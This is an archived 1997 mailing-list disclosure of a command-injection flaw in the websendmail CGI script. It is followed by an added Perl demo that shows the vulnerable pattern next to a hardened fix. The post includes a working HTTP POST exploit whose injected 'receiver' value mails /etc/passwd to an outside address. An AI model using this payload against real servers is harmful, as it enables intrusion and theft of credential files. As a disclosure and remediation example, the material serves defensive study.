Vulnerability in websendmail (fwd)
Julian Assange (proff@SUBURBIA.NET)
Tue, 8 Jul 1997 06:44:45 +1000
>From best-of-security-request@suburbia.net Tue Jul 8 06:37:42 1997
Return-Path: <best-of-security-request@suburbia.net>
Received: (from list@localhost) by suburbia.net (8.8.4/8.8.4) id GAA11901 for proff@suburbia.net; Tue, 8 Jul 1997 06:37:42 +1000 (EST)
Received: (qmail 11893 invoked from network); 7 Jul 1997 20:37:36 -0000
Received: from pop3.kappa.ro (drazvan@193.226.102.17) by suburbia.net with SMTP; 7 Jul 1997 20:37:36 -0000
Received: from localhost (drazvan@localhost) by pop3.kappa.ro (8.8.5/8.7.3) with SMTP id XAA16131 for <best-of-security@suburbia.net>; Mon, 7 Jul 1997 23:41:02 +0300
Date: Mon, 7 Jul 1997 23:41:02 +0300 (EET DST)
From: Razvan Dragomirescu <drazvan@kappa.ro>
To: best-of-security@suburbia.net
Subject: Vulnerability in websendmail
Message-ID: <Pine.LNX.3.95.970707233511.16089C-100000@pop3.kappa.ro>

Hi,

First, the story:

Websendmail is a cgi-bin that comes with the WEBgais package, which is an interface to the GAIS search tool. It is a PERL script that reads input from a form and sends e-mail to the specified destination. The version I am referring to is 1.0. It was released in 1995 but it is still used (I've just tested it :) ).

As many other cgi-bin programs, this one does not check for special characters in the user input. Here's what it does:

    (...)
    $cmd="| $MAILBIN $VAR_receiver";
    open (PIPEOUT, $cmd);

$VAR_receiver is read from the form. The script also does a little parsing on the string to "un-webify" it (converts pluses to spaces and %xx characters to their real value). So if we set $VAR_receiver to ';mail+your_address\@somewhere.org</etc/passwd;' it will do the job.

Now for the exploit:

    telnet target.machine.com 80
    POST /cgi-bin/websendmail HTTP/1.0
    Content-length: xxx

    receiver=;mail+your_address\@somewhere.org</etc/passwd;&sender=a&rtnaddr=a&subject=a&content=a

(xxx should be replaced with the actual length of the string passed to the server, in this case xxx=90.)

Don't worry if the server displays an error message. The password file is on the way :). You can use anything for the "sender", "rtnaddr", "subject" and "content", just make sure they're there, the script checks for them.

That would be all. I'm expecting to hear from you.

Be good.
Razvan

--
Razvan Dragomirescu
drazvan@kappa.ro, drazvan@romania.ro, drazvan@roedu.net
Phone: +40-1-6866621
"Smile, tomorrow will be worse" (Murphy)
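The pattern the post describes, written out as an added example (this is not code from the original message or from the WEBgais package): the same "un-webify" decoding and two-argument pipe open() that the post quotes, placed next to a hardened version that validates the recipient and uses the list form of open() so no shell is involved. Assumptions for the demo: $MAILBIN is pointed at /bin/echo so nothing is mailed, the injected command is a harmless `id` instead of `mail ... </etc/passwd`, and the names unwebify, send_vulnerable, valid_recipient and send_hardened are mine.

```perl
#!/usr/bin/perl
# Added example, not code from the original post or from WEBgais.
# $MAILBIN is set to /bin/echo (an assumption for the demo) so nothing
# is actually mailed; the injected command is `id` rather than the
# post's `mail ... </etc/passwd`.
use strict;
use warnings;

my $MAILBIN = '/bin/echo';    # stand-in for the real mailer binary

# The echo stand-in never reads its stdin, so writing the message body
# into the pipe may hit EPIPE; don't let SIGPIPE kill the demo.
$SIG{PIPE} = 'IGNORE';

# "Un-webify" a form value as the post describes: '+' becomes a space
# and %xx becomes the byte it encodes. This is what turns a URL-safe
# payload back into shell metacharacters before it reaches open().
sub unwebify {
    my ($s) = @_;
    $s =~ tr/+/ /;
    $s =~ s/%([0-9A-Fa-f]{2})/chr(hex($1))/ge;
    return $s;
}

# The vulnerable pattern: the decoded recipient is interpolated into a
# command string, and two-argument open() hands that string to /bin/sh,
# so ';', '<', '|', '`' and friends are interpreted by the shell.
sub send_vulnerable {
    my ($receiver, $body) = @_;
    my $cmd = "| $MAILBIN $receiver";
    open(my $pipe, $cmd) or die "open: $!";
    print $pipe $body;
    close $pipe;                 # may fail with EPIPE for the echo stand-in
}

# Hardened version. Two independent fixes, both applied:
#  1. Validate the recipient against a strict pattern: first character
#     must be alphanumeric (so it can never be parsed as a mailer option
#     such as sendmail's -C) and no shell metacharacters are allowed.
#  2. Use the list form of open(): with more than one element after
#     '|-' Perl forks and execs $MAILBIN directly, with $receiver as a
#     single argv entry, and no shell is ever involved.
sub valid_recipient {
    my ($r) = @_;
    return $r =~ /^[A-Za-z0-9][A-Za-z0-9._+-]*\@[A-Za-z0-9][A-Za-z0-9.-]*$/;
}

sub send_hardened {
    my ($receiver, $body) = @_;
    die "rejected recipient: $receiver\n" unless valid_recipient($receiver);
    open(my $pipe, '|-', $MAILBIN, $receiver) or die "open: $!";
    print $pipe $body;
    close $pipe;
}

# --- demonstration --------------------------------------------------
# Constructed form value, URL-encoded the way a browser or the telnet
# session in the post would send it. After unwebify() it is ';id;'.
my $raw      = '%3Bid%3B';
my $receiver = unwebify($raw);

print "decoded receiver: [$receiver]\n";
print "vulnerable open -> the shell runs /bin/echo, then id:\n";
send_vulnerable($receiver, "body\n");

print "hardened open with the same value:\n";
eval { send_hardened($receiver, "body\n"); 1 } or print "  $@";

print "hardened open with a legitimate address:\n";
send_hardened('user@example.org', "body\n");   # echo just prints the address
```

Run it with `perl websendmail_demo.pl` on any Unix host that has /bin/echo. The vulnerable branch shows `id` executing from inside a "recipient" value; the hardened branch refuses the same value and, for a well-formed address, passes it to the mailer as a single argument. The allowlist regex is deliberately stricter than RFC 822 addresses: rejecting odd-but-valid addresses is a far cheaper failure than letting a shell see user input.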